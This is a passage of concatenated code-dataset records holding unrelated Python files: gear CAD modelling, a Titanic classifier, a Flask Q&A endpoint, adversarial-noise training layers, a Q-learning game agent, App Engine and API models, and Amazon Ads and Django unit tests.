faceWidth=10.0,\n pressureAngle=15.0,\n helixAngle=30.0,\n profileShift=0.35,\n addendumMod=0.25,\n dedendumMod=-0.2,\n rootFillet=0.75,\n tipChamfer=0.1,\n)\n\n\n# For gears to mesh, their module & pressure angles must match\n# Helix angle must be equal & opposite for helical gears\n# For spur gears set helixAngle to zero (default)\nGearB = 
cq_gears.cylindricalGear(\n teeth=53,\n module=GearA.module,\n faceWidth=10.0,\n pressureAngle=GearA.pressureAngle,\n helixAngle=-GearA.helixAngle,\n profileShift=0.0,\n addendumMod=0.5,\n dedendumMod=0.1,\n rootFillet=0.75,\n tipChamfer=0.1,\n)\n\n\n# The .mesh() function modifies the gear so that it meshes with\n# the specified gear at a specified centreDistance and backlash\n# If no centreDistance is specified, it is calculated\n# Otherwise, the parameter specified by the \"modify\" value is adjusted\n# This can currently be set to either \"profileShift\" or \"module\"\n# Any modifications are currently printed to console\n# centreDistance and relativeRotation are returned to help positioning later\ncd, relativeRotation = GearB.mesh(\n Gear=GearA, centreDistance=62.0, backlash=0.2, modify=\"profileShift\"\n)\n\n\n# Here we set up rotations so the gears mesh nicely\nrotationA = 0.0\nratio = GearB.teeth / GearA.teeth\nrotationB = relativeRotation - rotationA / ratio\n\n\n# To create the 3D model, you can call Gear.create3D()\n# In this case we pass a transformed workplane so the gears mesh nicely\n# It returns a workplane as with any other cadquery workplane function,\n# so you can continue adding features. In this case adding a hole and\n# chamfering both ends\nresultA = (\n GearA.create3D(\n workplane=cq.Workplane(\"XY\").transformed(\n offset=cq.Vector(0, 0, 0), rotate=cq.Vector(0, 0, rotationA)\n ),\n flankSplinePoints=4,\n )\n .faces(\">Z\")\n .hole(12.0)\n .faces(cq.selectors.NearestToPointSelector((0, 0, GearA.faceWidth / 2)))\n .edges()\n .chamfer(0.5)\n)\n\nresultB = (\n GearB.create3D(\n workplane=cq.Workplane(\"XY\").transformed(\n offset=cq.Vector(cd, 0, 0), rotate=cq.Vector(0, 0, rotationB)\n ),\n flankSplinePoints=4,\n )\n .faces(\">Z\")\n .hole(12.0)\n .faces(cq.selectors.NearestToPointSelector((cd, 0, GearA.faceWidth / 2)))\n .edges()\n .chamfer(0.5)\n)\n","sub_path":"Examples/cq_gears_example.py","file_name":"cq_gears_example.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"324211328","text":"\n#import the libraries\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.metrics import classification_report\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler, Imputer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_selection import SelectPercentile\nfrom sklearn.grid_search import GridSearchCV \n\n# Read data\ntest = pd.read_csv('../data/test.csv',header=0)\ntrain = pd.read_csv('../data/train.csv',header=0)\n\ndef combine_data():\n combined = train.append(test)\n combined.reset_index(inplace=True)\n combined.drop('index',inplace=True,axis=1)\n return combined\n\ndef prep_features(df):\n \n # embarked -> dummied\n df = df.join(pd.get_dummies(df['Embarked'].fillna('S').map(lambda x: x[0]),prefix='embarked', drop_first=True)) \n \n # gender -> dummied\n df['Gender'] = df['Sex'].map({'female': 0, 'male': 1}).astype(int)\n \n # Pclass -> dummied\n df = df.join(pd.get_dummies(df['Pclass'],prefix='Pclass', drop_first=True))\n \n # Cabin -> dummied\n df = df.join(pd.get_dummies(df['Cabin'].fillna('U').map(lambda x: x[0]),prefix='Cabin',drop_first=True))\n \n #########################\n ## Feature Engineering ##\n #########################\n \n # map name -> title\n df['Title'] = df['Name'].map(lambda name:name.split(',')[1].split('.')[0].strip())\n 
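# Illustrative (hypothetical passenger): \"Braund, Mr. Owen Harris\" -> split(',')[1] is \" Mr. Owen Harris\";\n # split('.')[0].strip() then yields \"Mr\".\n 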
Title_Dictionary = {\n \"Capt\": \"Officer\",\n \"Col\": \"Officer\",\n \"Major\": \"Officer\",\n \"Jonkheer\": \"Royalty\",\n \"Don\": \"Royalty\",\n \"Sir\" : \"Royalty\",\n \"Dr\": \"Officer\",\n \"Rev\": \"Officer\",\n \"the Countess\":\"Royalty\",\n \"Dona\": \"Royalty\",\n \"Mme\": \"Mrs\",\n \"Mlle\": \"Miss\",\n \"Ms\": \"Mrs\",\n \"Mr\" : \"Mr\",\n \"Mrs\" : \"Mrs\",\n \"Miss\" : \"Miss\",\n \"Master\" : \"Master\",\n \"Lady\" : \"Royalty\"\n }\n df = df.join(pd.get_dummies(df['Title'].map(Title_Dictionary),prefix='Title',drop_first=True))\n \n # Age Range\n df['Age'] = df.groupby(['Sex','Pclass','Title'])['Age'].transform(lambda x: x.fillna(x.median()))\n df = df.join(pd.get_dummies(pd.cut(df['Age'], 8),prefix='age_group', drop_first=True))\n \n # Family Size\n df = df.join(pd.get_dummies(df['SibSp'] + df['Parch'],prefix='family_size', drop_first=True))\n \n # Impute Fare\n df['Fare'].fillna(df['Fare'].mean(),inplace=True)\n \n # Fare per person\n df['fare_per_person'] = df['Fare'] / (df['SibSp'] + df['Parch'] + 1)\n \n del df['Name']\n del df['Sex']\n del df['Title']\n del df['Pclass']\n del df['Ticket']\n del df['Embarked'] \n del df['Cabin']\n \n return df\n\ndef make_predictions():\n \n df = combine_data()\n df = prep_features(df)\n \n train = df.ix[0:890]\n test = df.ix[891:]\n \n y_train = train.pop('Survived')\n X_train = train\n # DataFrame.drop returns None when inplace=True, so drop in place without assigning\n test.drop('Survived', axis=1, inplace=True)\n \n clf = Pipeline([\n ('impute', Imputer(strategy='median')),\n ('model', RandomForestClassifier(n_jobs=-1))\n ])\n\n params = {\n 'model__n_estimators': [200,220,240],\n 'model__max_depth' : [4,6,8,10],\n 'model__criterion': ['gini','entropy']\n }\n\n grid = GridSearchCV(clf, params, cv=10, scoring='roc_auc')\n grid.fit(X_train, y_train)\n \n pd.DataFrame({'PassengerId':test['PassengerId'],\n 'Survived' : grid.predict(test).astype(int)}).to_csv('../data/output.csv',index=False)\n\nif __name__ == \"__main__\":\n make_predictions()\n\n\n\n","sub_path":"Titanic/script/titanic_kaggle.py","file_name":"titanic_kaggle.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"411342686","text":"\nfrom flask import Blueprint, request, make_response, jsonify\n\nimport ast\n\nfrom app.utils.AnalysisOwlUtils import AnalysisOwlUtils\n\naskfor=Blueprint('askfor',__name__)\n\n\n@askfor.route('/ask/new')\ndef ask():\n return 'new!!!!'\n\n\n\n@askfor.route('/ask',methods=['GET','POST'])\ndef server_ask():\n if request.method == 'POST':\n # safely parse the Python-literal body into a dict (avoids eval on untrusted input)\n obj=ast.literal_eval(request.data.decode(encoding = \"utf-8\"))\n # print(obj['text'])\n comment = AnalysisOwlUtils.getClassComent('ontolo_classes', 'OCname', obj['text'])\n if comment:\n response = make_response(jsonify(comment))\n response.headers['Access-Control-Allow-Origin'] = '*'\n response.headers['Access-Control-Allow-Methods'] = 'OPTIONS,HEAD,GET,POST'\n response.headers['Access-Control-Allow-Headers'] = 'x-requested-with'\n return response\n else:\n return jsonify('No relevant answer found')","sub_path":"app/api/askfor.py","file_name":"askfor.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"553683221","text":"# -*- coding: utf-8 -*-\n#_author_='zichao';\n#date: 11/13/19 9:52\nimport torch\nimport torch.nn as nn\nfrom models.resnet import BasicBlock\n\nclass Conv(nn.Module):\n def __init__(self, in_planes, planes, kernel_size, stride, padding):\n super(Conv, self).__init__()\n self.conv = 
nn.Conv2d(in_planes, planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False).cuda()\n self.eps = torch.FloatTensor([0.001]).cuda()\n\n def forward(self, input, grad):\n adv = self.eps * grad.sign()\n new_input = input + adv\n new_output = self.conv(new_input)\n\n return new_output\n\nclass Conv1(nn.Module):\n def __init__(self, in_planes, planes, kernel_size, stride, padding):\n super(Conv1, self).__init__()\n self.conv = nn.Conv2d(in_planes, planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False).cuda()\n self.eps = torch.FloatTensor([0.01]).cuda()\n\n def forward(self, input, grad):\n adv = self.eps * grad.sign()\n new_input = input + adv\n new_output = self.conv(new_input)\n\n return new_output\n\n# class Small_group(nn.Module):\n# def __init__(self, in_planes, planes, kernel_size, stride, padding):\n# super(Small_group, self).__init__()\n# self.conv = nn.Conv2d(in_planes, planes, kernel_size=kernel_size, stride=stride, padding=padding, bias=False).cuda()\n# self.eps = torch.FloatTensor([0.01]).cuda()\n# self.bn =\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\nclass BasicGroup(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicGroup, self).__init__()\n self.conv_1 = conv3x3(inplanes, planes, stride)\n self.bn_1 = nn.BatchNorm2d(planes)\n self.relu = nn.ReLU(inplace=True)\n self.conv_2 = conv3x3(planes, planes)\n self.bn_2 = nn.BatchNorm2d(planes)\n self.downsample = downsample\n self.stride = stride\n self.eps = torch.FloatTensor([0.0001]).cuda()\n\n def forward(self, x, grad):\n residual = x\n x = x + self.eps * grad.sign()\n out = self.conv_1(x)\n out = self.bn_1(out)\n out = self.relu(out)\n\n out = self.conv_2(out)\n out = self.bn_2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n # out = self.relu(out)\n\n return out\n\nclass Layer_loss(nn.Module):\n def __init__(self):\n super(Layer_loss, self).__init__()\n def forward(self, ori_output, new_output, grad):\n loss = (new_output - ori_output).view(-1).dot(grad.contiguous().view(-1))\n return loss\n\n\ndef update_grad(model, layer_inputs, layer_outputs, grad_inputs, grad_outputs, layers, crit, lam):\n index = 0\n layer_loss = 0\n for p in model.modules():\n if isinstance(p, nn.Conv2d):\n # in_planes = p.in_channels\n # planes = p.out_channels\n # kernel_size = p.kernel_size[0]\n # padding = p.padding[0]\n # stride = p.stride[0]\n #\n # layer = Conv(in_planes, planes, kernel_size, stride,padding)\n\n layer = layers[index]\n layer.conv.load_state_dict(p.state_dict())\n layer.zero_grad()\n layer_input = layer_inputs[index]\n layer_output = layer_outputs[index]\n grad_input = grad_inputs[32- index]\n grad_output = grad_outputs[32 - index]\n new_output = layer(layer_input, grad_input)\n # crit = Layer_loss()\n loss = crit(layer_output, new_output, grad_output)\n # loss.backward()\n layer_loss +=loss\n index += 1\n # if index > 0:\n loss_index = 0\n layer_loss = layer_loss/(index + 1)\n layer_loss.backward()\n for p in model.modules():\n if isinstance(p, nn.Conv2d):\n layer =layers[loss_index]\n p.weight.grad = lam * p.weight.grad + (1-lam) * layer.conv.weight.grad\n loss_index += 1\n\n return layer_loss\n\ndef group_noise(model, groups, crit, alpha):\n index = 0\n layer_loss = 0\n for p in model.modules():\n if isinstance(p, BasicBlock):\n group = 
groups[index]\n group.load_state_dict(p.state_dict())\n group.zero_grad()\n # if index > 0 and index%5 == 0 :\n # group.eps *= mults\n group_input = p.info['input']\n group_output = p.info['output']\n grad_input = p.info['input_grad']\n grad_output = p.info['output_grad']\n new_output = group(group_input, grad_input)\n loss = crit(group_output, new_output, grad_output)\n\n loss = loss/len(groups)\n loss.backward()\n\n # for para in p.parameters():\n # print('yes')\n p.conv_1.weight.grad = alpha * p.conv_1.weight.grad + (1 - alpha) * group.conv_1.weight.grad\n p.conv_2.weight.grad = alpha * p.conv_2.weight.grad + (1 - alpha) * group.conv_2.weight.grad\n\n layer_loss += loss.item()\n index +=1\n\n return layer_loss\n","sub_path":"update_noise.py","file_name":"update_noise.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"21551171","text":"from yolapy.services import Yola\n\n\nclass Subscription(object):\n\n \"\"\"Construct a Subscription.\n\n :param id: Str, 32 char ID\n :param created_at: Str, creation time\n :param updated_at: Str, last update time\n :param partner_id: Str, ID of the partner\n :param user_id: Str, 32 character ID of the owner\n :param status: Str\n :param term: Str\n :param sku: Str, SKU of the related product\n :param type: Str,\n :param start_date: Str\n :param expiry_date: Str\n :param billing_date: Str\n :param deprovision_date: Str\n :param auto_renew: Bool\n :param properties: Dict\n\n :return: Subscription\n :rtype: yolapy.models.Subscription\n\n \"\"\"\n\n _fields = (\n 'id', 'created_at', 'updated_at', 'partner_id', 'user_id', 'status',\n 'term', 'sku', 'type', 'start_date', 'expiry_date', 'billing_date',\n 'deprovision_date', 'auto_renew', 'properties')\n\n def __init__(self, **fields):\n self.client = Yola()\n for field_name in self._fields:\n setattr(self, field_name, fields.get(field_name))\n\n @classmethod\n def list(cls, **kwargs):\n \"\"\"Return a filtered list of Subscriptions.\n\n Usage::\n\n >>> from yolapy.models import Subscription\n >>> user_id = 'abcdef1234567890abcdef1234567890'\n >>> user_subs = Subscription.list(user_id=user_id)\n >>> print user_subs[0]\n \n >>> print user_subs[0].user_id\n u'abcdef1234567890abcdef1234567890'\n \"\"\"\n response = Yola().list_subscriptions(**kwargs)\n return [cls(**sub) for sub in response['results']]\n","sub_path":"yolapy/models/subscription.py","file_name":"subscription.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"468130522","text":"# This is necessary to find the main code\nimport math\nimport sys\nfrom state import State\nimport numpy as np\nimport random\n\nsys.path.insert(0, '../bomberman')\n# Import necessary stuff\nfrom entity import CharacterEntity\nfrom colorama import Fore, Back\nimport pickle\nimport os\n\n\nclass Qlearning:\n\n def __init__(self, total_reward, filename=\"../lessons.p\"):\n self.total_reward = total_reward\n self.alpha = 0.05\n self.gamma = 0.9\n self.default_reward = 0\n self.filename = filename\n\n if os.path.exists(filename):\n file = open(filename, 'rb')\n self.Q = pickle.load(file)\n file.close()\n else:\n self.Q = {}\n\n def step(self, state, eps=0.15):\n \"\"\"\n Steps through one state\n \"\"\"\n if state not in self.Q:\n self.Q[state] = {action: self.default_reward for action in self.all_actions(state)}\n\n if np.random.uniform() < eps:\n act = self.sample(state)\n else:\n 
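# exploit: choose the action with the highest learned Q-value for this state\n            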
act = self.max_for_state(state)[0]\n        print(f\"State: {state} Act: {act} Score: {self.Q[state][act]}\")\n        return act\n\n    def save_outcome(self, action, new_state, old_state, reward):\n        \"\"\"\n        Saves the action\n        \"\"\"\n        a1, max_q_s1a1 = self.max_for_state(new_state)\n        self.Q[old_state][action] = self.alpha * (reward + self.gamma * max_q_s1a1) + (1 - self.alpha) * self.Q[old_state][action]\n\n        file = open(self.filename, 'wb')\n        pickle.dump(self.Q, file)\n        file.close()\n\n    def sample(self, state):\n        \"\"\"\n        Gets random move\n        \"\"\"\n        return random.choice(self.possible_actions(state))\n\n    @staticmethod\n    def possible_actions(state):\n        \"\"\"\n        gets all possible actions\n        \"\"\"\n        moves = state.valid_moves\n        arr = []\n        for move in moves:\n            if not state.bomb_placed:\n                arr.append((move, True))\n            arr.append((move, False))\n        return arr\n\n    @staticmethod\n    def all_actions(state):\n        \"\"\"\n        gets all possible actions\n        \"\"\"\n        moves = [(x, y) for x in range(- 1, 2) for y in range(- 1, 2)]\n        arr = []\n        for move in moves:\n            if not state.bomb_placed:\n                arr.append((move, True))\n            arr.append((move, False))\n        return arr\n\n    def max_for_state(self, state):\n        \"\"\"\n        Gets the maximum dictionary\n        \"\"\"\n        if state not in self.Q:\n            self.Q[state] = {action: self.default_reward for action in self.all_actions(state)}\n\n        d = self.Q[state]\n        options = self.possible_actions(state)\n\n        max_v = float('-inf')\n        max_key = None  # guard against UnboundLocalError when no scored action is currently possible\n        for key, val in d.items():\n            if key in options and val > max_v:\n                max_v = val\n                max_key = key\n        return max_key, max_v\n","sub_path":"Bomberman/groupNN/qlearning.py","file_name":"qlearning.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"386655893","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport re\nimport cgi\nimport urllib\nfrom services.exceptions import *\nfrom google.appengine.ext import db\nfrom services.tools import *\n\nclass TemporaryWarehouse(db.Model):\n\tautoId = db.IntegerProperty(required=False, default=0)\n\teventId = db.IntegerProperty(required=True)\n\tname = db.StringProperty(required=True)\n\tresponsable = db.StringProperty(required=False)\n\tlatitude = db.FloatProperty(required=False)\n\tlongitude = db.FloatProperty(required=False)\n\tlocationName = db.StringProperty(required=False)\n\taddress = db.StringProperty(required=False)\n\tstateWarehouse = db.StringProperty(required=False)\n\tcreatedDate = db.DateTimeProperty(required=False)\n\tcompanyId = db.IntegerProperty(required=False)\n\tisActive = db.BooleanProperty(required=False)\n\n\tdef toDict(self):\n\t\tidVal = {\"id\":str(self.key().id())}\n\t\tobjDic = dict([(p, unicode(getattr(self, p))) for p in self.properties()])\n\t\tobjDic.update(idVal)\n\t\treturn objDic\n\n\tdef toDictFront(self):\n\t\tobjDic={}\n\t\tobjDic[\"id\"]=str(self.key().id())\n\t\tobjDic[\"autoId\"]=str(self.autoId)\n\t\tif self.eventId is not None:\n\t\t\tobjDic[\"eventId\"]=str(self.eventId)\n\t\tif self.name is not None:\n\t\t\tobjDic[\"name\"]=self.name\n\t\tif self.responsable is not None:\n\t\t\tobjDic[\"responsable\"]=self.responsable\n\t\tif self.latitude is not None:\n\t\t\tobjDic[\"latitude\"]=self.latitude\n\t\tif self.longitude is not None:\n\t\t\tobjDic[\"longitude\"]=self.longitude\n\t\tif self.locationName is not None:\n\t\t\tobjDic[\"locationName\"]=self.locationName\n\t\tif self.isActive is not None:\n\t\t\tobjDic[\"isActive\"]=self.isActive\n\t\treturn objDic\n\n\tdef 
toDictReduced(self):\n\t\tobjDic={}\n\t\tobjDic[\"id\"]=str(self.key().id())\n\t\tobjDic[\"autoId\"]=str(self.autoId)\n\t\tif self.eventId is not None:\n\t\t\tobjDic[\"eventId\"]=str(self.eventId)\n\t\tif self.name is not None:\n\t\t\tobjDic[\"name\"]=self.name\n\t\tif self.responsable is not None:\n\t\t\tobjDic[\"responsable\"]=self.responsable\n\t\tif self.latitude is not None:\n\t\t\tobjDic[\"latitude\"]=self.latitude\n\t\tif self.longitude is not None:\n\t\t\tobjDic[\"longitude\"]=self.longitude\n\t\tif self.locationName is not None:\n\t\t\tobjDic[\"locationName\"]=self.locationName\n\t\tif self.isActive is not None:\n\t\t\tobjDic[\"isActive\"]=self.isActive\n\t\treturn objDic\n\n'''\neventId, name, responsable, latitude, longitude, locationName, stateWarehouse, isActive\n\neventId=eventId, name=name, responsable=responsable, latitude=latitude, longitude=longitude, locationName=locationName, stateWarehouse=stateWarehouse, createdDate=createdDate, isActive=isActive\n\neventId\nname\nresponsable\nlatitude\nlongitude\nlocationName\nstateWarehouse\nisActive\n\n'''","sub_path":"services/models/temporaryWarehouseModel.py","file_name":"temporaryWarehouseModel.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"190205389","text":"import numpy as np\nimport pandas as pd\n\nfrom astropy.table import Table\nfrom pkg_resources import resource_exists, resource_filename\nfrom air2vac import air2vac\n\n\n# resource_filename('desispec', 'data/emlines.par') \nfname = '/global/homes/m/mjwilson/desi/DX2DROPOUT/emlines.par'\n\n## http://www.sdss3.org/svn//repo/idlspec2d/trunk/etc/emlines.par\nlines = pd.read_csv(fname, sep='\\s+', skiprows=16, names=['LINEID', 'WAVELENGTH', 'NAME', 'REDSHIFT GROUP', 'WIDTH GROUP', 'FLUX GROUP', 'SCALE FACTOR'], comment='#')\nlines['INDEX'] = np.arange(len(lines))\nlines['GROUP'] = lines.groupby(['REDSHIFT GROUP', 'WIDTH GROUP']).ngroup()\nlines['DOUBLET'] = np.zeros(len(lines), dtype=int) - 99  # np.int was removed from NumPy; plain int works\nlines['WAVELENGTH'] = air2vac(lines['WAVELENGTH'])\n\nprint('\\n\\n** Converting to vacuum wavelengths. ** \\n\\n')\n\nlines = Table(lines.to_numpy(), names=lines.columns)\n\nfor i, x in enumerate([[6, 7], [16, 17], [25, 27]]):\n    for y in x:\n        lines['DOUBLET'][y] = i\n\nlines['LINERATIO'] = 0.0\nlines['LINERATIO'][6] = 0.7\nlines['LINERATIO'][7] = 0.7\nlines['LINERATIO'][16] = 0.7\nlines['LINERATIO'][17] = 0.7\n\nlines['MASKED'] = np.zeros(len(lines), dtype=int)\n\n# Ignored in chi sq. and not plotted: 2, 5, 25, 27, 30, 8, 14.\n
for x in [2, 5, 25, 27, 30, 8, 14]:\n    lines['MASKED'][x] = 1\n\n# Balmer.\n# for x in [11, 12, 15]:\n#     lines['MASKED'][x] = 1\n\n# lines = lines[lines['MASKED'] == 0]\n\nugroups, ugroupcnts = np.unique(lines['GROUP'][lines['MASKED'] == 0].data, return_counts=True)\n\n## ---- OII wavelengths ----\n## lines.loc[6,'WAVELENGTH'] \n## lines.loc[7,'WAVELENGTH']\n\nif __name__ == '__main__':\n    lineids = np.arange(len(lines))\n\n    singlets = lines[lineids][lines['DOUBLET'][lineids] == -99]\n    doublets = lines[lineids][lines['DOUBLET'][lineids] >= 0]\n\n    nsinglet = len(singlets)\n    ndoublet = len(doublets) // 2  # integer division; np.int no longer exists\n\n    print()\n    print('n singlets: {}, n doublets: {}'.format(nsinglet, ndoublet))\n    print()\n    print('unique groups: {}, counts: {}'.format(ugroups, ugroupcnts))\n    print()\n    print(singlets)\n    print()\n    print(doublets)\n    print('\\n\\n')\n","sub_path":"lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"172450009","text":"#\n# Copyright (c) 2023 Airbyte, Inc., all rights reserved.\n#\n\nimport json\n\nimport pytest\nimport requests\nimport responses\nfrom airbyte_cdk.models import SyncMode\nfrom jsonschema import validate\nfrom source_amazon_ads import SourceAmazonAds\n\n\ndef setup_responses(\n    profiles_response=None,\n    attribution_report_response=None,\n):\n    responses.add(\n        responses.POST,\n        \"https://api.amazon.com/auth/o2/token\",\n        json={\"access_token\": \"alala\", \"expires_in\": 10},\n    )\n    if profiles_response:\n        responses.add(\n            responses.GET,\n            \"https://advertising-api.amazon.com/v2/profiles\",\n            body=profiles_response,\n        )\n    if attribution_report_response:\n        responses.add(\n            responses.POST,\n            \"https://advertising-api.amazon.com/attribution/report\",\n            body=attribution_report_response,\n        )\n\n\ndef get_all_stream_records(stream):\n    records = stream.read_records(SyncMode.full_refresh)\n    return [r for r in records]\n\n\ndef get_stream_by_name(streams, stream_name):\n    for stream in streams:\n        if stream.name == stream_name:\n            return stream\n    raise Exception(f\"Expected stream {stream_name} not found\")\n\n\n@pytest.mark.parametrize(\n    (\"stream_name\", \"report_type\"),\n    [\n        (\"attribution_report_products\", \"PRODUCTS\"),\n        (\"attribution_report_performance_adgroup\", \"PERFORMANCE_ADGROUP\"),\n        (\"attribution_report_performance_campaign\", \"PERFORMANCE_CAMPAIGN\"),\n        (\"attribution_report_performance_creative\", \"PERFORMANCE_CREATIVE\"),\n    ],\n)\n@responses.activate\ndef test_attribution_report_schema(config, profiles_response, attribution_report_response, stream_name, report_type):\n    # custom start date\n    config[\"start_date\"] = \"2022-09-03\"\n\n    setup_responses(profiles_response=profiles_response, attribution_report_response=attribution_report_response(report_type))\n\n    source = SourceAmazonAds()\n    streams = source.streams(config)\n\n    profile_stream = get_stream_by_name(streams, \"profiles\")\n    attribution_report_stream = get_stream_by_name(streams, stream_name)\n    schema = attribution_report_stream.get_json_schema()\n\n    profile_records = get_all_stream_records(profile_stream)\n    attribution_records = get_all_stream_records(attribution_report_stream)\n    assert len(attribution_records) == len(profile_records) * len(json.loads(attribution_report_response(report_type)).get(\"reports\"))\n\n    for record in attribution_records:\n        validate(schema=schema, instance=record)\n\n\n@pytest.mark.parametrize(\n    (\"stream_name\", 
\"report_type\"),\n [\n (\"attribution_report_products\", \"PRODUCTS\"),\n (\"attribution_report_performance_adgroup\", \"PERFORMANCE_ADGROUP\"),\n (\"attribution_report_performance_campaign\", \"PERFORMANCE_CAMPAIGN\"),\n (\"attribution_report_performance_creative\", \"PERFORMANCE_CREATIVE\"),\n ],\n)\n@responses.activate\ndef test_attribution_report_with_pagination(mocker, config, profiles_response, attribution_report_response, stream_name, report_type):\n profiles = json.loads(profiles_response)\n # use only single profile\n profiles_response = json.dumps([profiles[0]])\n\n setup_responses(profiles_response=profiles_response)\n\n source = SourceAmazonAds()\n streams = source.streams(config)\n\n attribution_report_stream = get_stream_by_name(streams, stream_name)\n attribution_data = json.loads(attribution_report_response(report_type))\n\n def _callback(request: requests.PreparedRequest):\n attribution_data[\"cursorId\"] = None\n request_data = json.loads(request.body)\n\n if request_data[\"count\"] > 0:\n mocker.patch(\"source_amazon_ads.streams.attribution_report.AttributionReport.page_size\", 0)\n attribution_data[\"cursorId\"] = \"next_page_token\"\n\n return 200, {}, json.dumps(attribution_data)\n\n responses.add_callback(\n responses.POST,\n \"https://advertising-api.amazon.com/attribution/report\",\n content_type=\"application/json\",\n callback=_callback,\n )\n\n attribution_records = get_all_stream_records(attribution_report_stream)\n\n # request should be called 2 times for a single profile\n assert len(attribution_records) == 2 * len(attribution_data.get(\"reports\"))\n\n\n@pytest.mark.parametrize(\n (\"stream_name\", \"report_type\"),\n [\n (\"attribution_report_products\", \"PRODUCTS\"),\n (\"attribution_report_performance_adgroup\", \"PERFORMANCE_ADGROUP\"),\n (\"attribution_report_performance_campaign\", \"PERFORMANCE_CAMPAIGN\"),\n (\"attribution_report_performance_creative\", \"PERFORMANCE_CREATIVE\"),\n ],\n)\n@responses.activate\ndef test_attribution_report_no_data(config, profiles_response, attribution_report_bad_response, stream_name, report_type):\n # custom start date\n config[\"start_date\"] = \"2022-09-03\"\n\n setup_responses(profiles_response=profiles_response, attribution_report_response=attribution_report_bad_response)\n\n source = SourceAmazonAds()\n streams = source.streams(config)\n\n attribution_report_stream = get_stream_by_name(streams, stream_name)\n attribution_records = get_all_stream_records(attribution_report_stream)\n assert len(attribution_records) == 0\n","sub_path":"dts/airbyte/airbyte-integrations/connectors/source-amazon-ads/unit_tests/test_attribution_report.py","file_name":"test_attribution_report.py","file_ext":"py","file_size_in_byte":5209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"250787668","text":"import jdatetime\nfrom django.test import TestCase\nfrom django.shortcuts import reverse\nfrom rest_framework import status\nfrom django.conf import settings\nfrom core.tests.factory.factories import UserFactory\nfrom request.models import Xpref, PrefSpec\nfrom request.tests.non_api.factory import factories\nfrom request.helpers import helpers\nfrom request.tests.non_api.factory.base_proformas import BaseProformaFactories\nfrom request.tests.non_api.factory.factories import ProformaFactory\nfrom request.tests.non_api.order import prevent_request_warnings\n\n\nclass TestPublicCost(TestCase):\n\n def setUp(self):\n self.user = UserFactory.create()\n\n def 
test_prevents_unauth_user_to_get_proforma_profit(self):\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertRedirects(\n res,\n expected_url=settings.LOGIN_URL + '?next=' + reverse('prof_profit', kwargs={'ypref_pk': proforma.pk}),\n status_code=status.HTTP_302_FOUND,\n target_status_code=status.HTTP_200_OK,\n )\n\n def test_prevent_unauthorized_user_total_profit(self):\n url = reverse('total_profit')\n res = self.client.get(url)\n self.assertRedirects(\n res,\n expected_url=settings.LOGIN_URL + '?next=' + url,\n status_code=status.HTTP_302_FOUND,\n target_status_code=status.HTTP_200_OK\n )\n\n\nclass PrivateTestCost(TestCase):\n\n def setUp(self):\n self.user = UserFactory.create()\n self.superuser = UserFactory.create(is_superuser=True)\n\n def prepare_prof_routine_not_routine_specs(self):\n date = jdatetime.date(year=1399, month=7, day=15)\n proforma = ProformaFactory.create()\n proforma.date_fa = date\n proforma.save()\n\n factories.ProformaSpecFactory.create(xpref_id=proforma, qty=1, price=160000000, kw=18.5, rpm=3000)\n factories.ProformaSpecFactory.create(xpref_id=proforma, qty=1, price=160000000, kw=2500, rpm=3000)\n\n @prevent_request_warnings\n def test_prevents_user_with_no_permission_to_get_proforma_profit(self):\n self.client.force_login(self.user)\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n @prevent_request_warnings\n def test_superuser_get_proforma_profit(self):\n self.client.force_login(self.user)\n\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_calculate_proforma_profit(self):\n self.client.force_login(self.superuser)\n\n self.prepare_prof_routine_not_routine_specs()\n proforma = ProformaFactory.create()\n\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n\n self.assertIn('proforma', res.context)\n proforma_result = res.context['proforma']\n self.assertEqual(proforma_result['cost'], 1009281963.20)\n self.assertEqual(round(proforma_result['profit'], 2), 150718036.80)\n self.assertEqual(round(proforma_result['percent'], 2), 14.93)\n\n def test_proforma_profit_path_with_specs(self):\n self.client.force_login(self.superuser)\n self.prepare_prof_routine_not_routine_specs()\n\n proforma = ProformaFactory.create()\n url = reverse('prof_profit', kwargs={'ypref_pk': proforma.pk})\n res = self.client.get(url)\n\n 